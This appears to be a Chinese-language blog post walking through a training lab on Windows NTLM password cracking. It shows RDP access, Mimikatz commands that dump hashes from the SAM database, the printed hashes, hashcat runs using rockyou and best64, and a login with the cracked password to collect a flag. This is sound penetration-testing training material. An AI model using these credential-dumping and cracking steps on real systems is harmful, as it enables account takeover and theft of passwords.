NTLM 密碼破解
NTLM 密碼破解
Windows 將使用者密碼雜湊儲存在安全帳戶管理員 SAM 資料庫檔案中
核心對該檔案保持獨佔檔案系統鎖定
路徑位於 C:\Windows\system32\config\sam
靶機 IP : 192.168.197.210,獲取 nelly 用戶桌面上的 Flag
已知一般使用者帳號密碼 : offsec / lab
第一步 xfreerdp 登入遠端主機並掛載磁碟機
└─$ xfreerdp -v:192.168.197.210 -u:offsec -p:lab -drive:aries,/home/kali_r/Templates
透過管理員身份啟動 PowerShell,然後啟動 Mimikatz
開始提取密碼,分別輸入以下指令 (每個指令由一個模組和兩個冒號分隔的指令組成)
- privilege::debug
- token::elevate
- lsadump::sam
下面可以看到我們想要的使用者 nelly 的 hash 了,主要要的是這一段
Hash NTLM: 3ae8e5f0ffabb3a627672e1600f1ba10
先建立一個檔案 nelly.hash 並將 HASH 內容貼上
透過指令 └─$ hashcat --help | grep -i "ntlm" 查一下 NTLM 的 mode,是 1000
直接 hashcat 下去破解密碼吧,帶入 rockyou.txt 與 best64 規則來變異密碼表
└─$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
RDP 進去看看 └─$ xfreerdp -v:192.168.197.210 -u:nelly -p:nicole1
登入後拿到目標 Flag 了
靶機 2 : 192.168.197.227
已知使用者 nadine 與密碼 123abc,獲取使用者 steve 的密碼明文
一樣 RDP 登入後開啟 Mimikatz 獲取 steve 的 HASH 如下
Hash NTLM: 2835573fb334e3696ef62a00e5cf7571
hashcat 下去 └─$ hashcat -m 1000 steve.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
留言
張貼留言